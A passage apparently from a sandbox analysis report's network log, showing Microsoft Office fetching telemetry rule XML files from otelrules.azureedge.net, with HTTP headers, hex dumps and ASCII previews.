                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:14 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                        ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                        x-ms-request-id: 7b3b97af-701e-003e-795c-3d79b3000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011414Z-178bfbc474b9fdhphC1NYCac0n00000005700000000068zs
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:14 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        129192.168.2.54989913.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:15 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:16 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                        x-ms-request-id: 21476416-401e-00a3-1c88-3a8b09000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011416Z-178bfbc474bmqmgjhC1NYCy16c000000058000000000g3px
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:16 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        130192.168.2.54990013.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:15 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:16 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                        ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                        x-ms-request-id: 1a99a412-f01e-0099-613c-3c9171000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011416Z-15b8b599d88wn9hhhC1TEBry0g00000003sg00000000d21z
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:16 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        131192.168.2.54990213.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:15 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:16 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:16 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                        x-ms-request-id: 1eb9d342-301e-005d-4e03-3de448000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011416Z-178bfbc474bwlrhlhC1NYCy3kg00000005b0000000002u0m
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:16 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        132192.168.2.54990113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:16 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:16 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:16 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                        ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                        x-ms-request-id: 472a4abf-401e-0083-0c03-3e075c000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011416Z-178bfbc474b7cbwqhC1NYC8z4n000000052g00000000gsvz
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:16 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        133192.168.2.54990313.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:16 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:16 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE976026E"
                                                                                                                                                                                        x-ms-request-id: 0b679675-f01e-005d-336b-3b13ba000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011416Z-178bfbc474bwh9gmhC1NYCy3rs00000005e0000000000z7v
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:16 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        134192.168.2.54990413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:17 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:18 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:18 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                        x-ms-request-id: a1d7de20-e01e-0051-6948-3c84b2000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011418Z-178bfbc474bv7whqhC1NYC1fg4000000056g00000000fevw
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:18 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        135192.168.2.54990513.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:18 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:18 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1425
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                        x-ms-request-id: 5a5a1706-c01e-0079-6c8c-3ae51a000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011418Z-174c587ffdf9xbcchC1TEBxkz400000003p0000000003t1e
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:18 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        136192.168.2.54990613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:18 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:18 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:18 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1388
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                        x-ms-request-id: ab1afa94-201e-0085-151a-3d34e3000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011418Z-178bfbc474b7cbwqhC1NYC8z4n000000056g000000007260
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:18 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        137192.168.2.54990713.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:18 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:18 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1415
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                        x-ms-request-id: 5431248a-601e-005c-155d-3df06f000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011418Z-15b8b599d885v8r9hC1TEB104g00000003vg000000002xtt
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
